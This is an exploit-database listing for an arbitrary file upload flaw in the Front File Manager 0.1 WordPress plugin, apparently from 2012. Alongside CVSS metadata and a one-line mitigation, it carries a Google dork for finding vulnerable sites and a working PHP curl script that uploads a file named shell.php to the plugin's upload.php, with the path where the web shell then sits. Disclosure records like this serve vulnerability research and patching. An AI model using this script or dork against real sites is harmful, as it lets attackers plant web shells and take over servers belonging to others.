header-logo
Suggest Exploit
vendor:
Front File Manager
by:
Adrien Thierry
7,5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Front File Manager
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:webikon:front_file_manager:0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2012

WordPress front file manager 0.1 Arbitrary File Upload

Page upload.php is vulnerable to Remote File Upload. An attacker can upload a malicious file to the server by sending a POST request to the upload.php page with the malicious file and the name of the file as parameters. The malicious file can be found at http://site.com/wp-content/plugins/uploads/[YYYY]/[MM]/shell.php

Mitigation:

Ensure that the application is not vulnerable to arbitrary file uploads. Validate the file type and size before uploading it to the server.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress front file manager 0.1 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/front-file-manager/
# Date: 07/06/2012
# Exploit Author: Adrien Thierry 
# adrien dot thierryfr at gmail dot com
# Vendor Homepage: http://www.webikon.sk/en
# Software Link: http://downloads.wordpress.org/plugin/front-file-manager.zip
# Version: 0.1

Page upload.php is vulnerable to Remote File Upload. Code :

<?php
$u="whatyouwant.php";
$c = curl_init("http://site.com/wp-content/plugins/front-file-manager/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('file'=>"@$u",
'name'=>"shell.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>



Shell could be found at :
	http://site.com/wp-content/plugins/uploads/2012/06/shell.php
	(http://site.com/wp-content/plugins/uploads/[YYYY]/[MM]/shell.php
	
#########################################################################################